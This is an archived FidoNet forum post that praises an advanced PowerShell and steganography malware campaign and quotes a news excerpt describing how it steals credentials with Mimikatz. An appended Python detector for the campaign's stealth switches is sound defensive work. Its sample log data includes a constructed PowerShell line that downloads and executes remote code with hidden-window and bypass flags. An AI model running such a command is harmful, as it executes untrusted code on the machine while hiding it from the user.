Just a sample of the Echomail archive
Cooperative anarchy at its finest, still active today. Darkrealms is the Zone 1 Hub.
Area: INTERNET ("The global pornography network"), 2,155 messages
Message 1,566 of 2,155
From: August Abolins
To: All
Subject: New Malware Attack is a Work of Art
Date: 30 May 20 16:42:00
MSGID: 2:221/1.58@fidonet e4eb58fa
PID: OpenXP/5.0.44 (Win32)
CHRS: ASCII 1
TZUTC: -0400

>==================================================================<
 ** Original area : "/grc/security"
 ** Original message from : jeff@jeffroot.us (Jeff Root)
 ** Original message to :
 ** Original date/time : 30 May 20, 15:19
>==================================================================<

This is truly a thing of beauty.

If only they'd chosen niceness, instead of evil.

https://arstechnica.com/information-technology/2020/05/an-advanced-and-unconventional-hack-is-targeting-industrial-firms/

Whoever is behind this is truly an artist.

Jeff

>==================================================================<
Excerpt from the article:
>==================================================================<

The attacks begin with emails that are customized for each target..

For the exploit to trigger, the language in the email must match the
localization of the target's operating system..

Recipients who click on a request to urgently enable the document's active
content will see no indication anything is amiss. Behind the scenes,
however, a macro executes a Powershell script. The reason it stays hidden:
the command parameters:

  ExecutionPolicy ByPass - to override organization policies
  WindowStyle Hidden - this hides the PowerShell window
  NoProfile - executes the script with no end-user configuration

Triple-encoded steganography, anyone?

The PowerShell script reaches out to either imgur.com or imgbox.com and
downloads an image that has malicious code hidden inside the pixels
through a technique called steganography. The data is encoded by the
Base64 algorithm, encrypted with an RSA key, and then Base64-encoded
again.

In a clever move, the script contains an intentional error in its
code. The resulting error message that's returned, which is different for
each language pack installed on the OS, is the decryption key.

The decrypted and decoded data is used as a second PowerShell script that,
in turn, unpacks and decodes another blob of Base64-encoded data. With
that, a third obfuscated PowerShell script executes Mimikatz malware
that's designed to steal Windows account credentials used to access
various network resources. In the event stolen credentials include those
for the all-powerful Windows Active Directory, attackers have access to
virtually every node on the network.

>==================================================================<

--- OpenXP 5.0.44
 * Origin: (2:221/1.58)
SEEN-BY: 1/123 90/1 120/340 601 123/131 226/30 227/114 702 229/101
SEEN-BY: 229/424 426 452 664 1014 240/5832 249/206 317 400 292/854
SEEN-BY: 317/3 322/757 342/200
PATH: 221/1 280/464 229/101 426
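Added example, not part of the post or the article it quotes: a small detector for the three stealth switches the excerpt names (ExecutionPolicy Bypass, WindowStyle Hidden, NoProfile), run over constructed process-creation records, with an Office parent and an imgur/imgbox download reported as extra indicators. The record format, the sample command lines and the Office parent list are assumptions; the flag matcher also accepts the prefix abbreviations powershell.exe takes (-nop, -w, -ep), so the rule is not defeated by shortening the switches.

```python
import re
# Constructed sample process-creation records (not from the post): "<ts>|<parent>|<cmdline>"
SAMPLE_LOGS = r"""
2020-05-30T15:19:01|WINWORD.EXE|powershell.exe -ExecutionPolicy ByPass -WindowStyle Hidden -NoProfile -Command "IEX (New-Object Net.WebClient).DownloadString('https://i.imgur.com/EXAMPLE.png')"
2020-05-30T15:20:11|WINWORD.EXE|powershell.exe -nop -w hidden -ep bypass -c "Get-Date"
2020-05-30T15:21:40|explorer.exe|powershell.exe -NoProfile -File C:\Scripts\backup.ps1
"""
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}  # assumed list
IMAGE_HOSTS = ("imgur.com", "imgbox.com")  # the hosts named in the excerpt

def canonical_flag(token):
    """Map a powershell.exe switch, possibly abbreviated (-nop, -w, -ep), to its full name.
    powershell.exe accepts unambiguous parameter prefixes; returns None for non-switches."""
    t = token.lstrip("-/").lower()
    if not t or len(t) == len(token):
        return None
    if t == "ep" or (len(t) >= 2 and "executionpolicy".startswith(t)):
        return "executionpolicy"
    if "windowstyle".startswith(t):
        return "windowstyle"
    if len(t) >= 3 and "noprofile".startswith(t):
        return "noprofile"

def indicators(parent, cmdline):
    """Collect the indicators the excerpt describes for one process record."""
    found, tokens = set(), cmdline.split()
    for i, tok in enumerate(tokens):
        name = canonical_flag(tok)
        value = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        if name == "executionpolicy" and value in ("bypass", "unrestricted"):
            found.add("exec_policy_bypass")
        elif name == "windowstyle" and value == "hidden":
            found.add("hidden_window")
        elif name == "noprofile":
            found.add("no_profile")
    if parent.lower() in OFFICE_PARENTS:  # macro-spawned shell, as in the excerpt
        found.add("office_parent")
    for host in re.findall(r"https?://([A-Za-z0-9.-]+)", cmdline):
        if host.lower().endswith(IMAGE_HOSTS):
            found.add("image_host:" + host.lower())
    return found

def detect(log_text):
    """Alert on records that combine all three stealth switches; report extras alongside."""
    alerts = []
    for line in log_text.strip().splitlines():
        ts, parent, cmd = line.split("|", 2)
        found = indicators(parent, cmd)
        if {"exec_policy_bypass", "hidden_window", "no_profile"} <= found:
            alerts.append({"time": ts, "parent": parent, "indicators": sorted(found)})
    return alerts
```

A single switch such as -NoProfile on its own is normal administrative use and is deliberately not alerted on; only the combination the article describes fires.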
(c) 1994, bbs@darkrealms.ca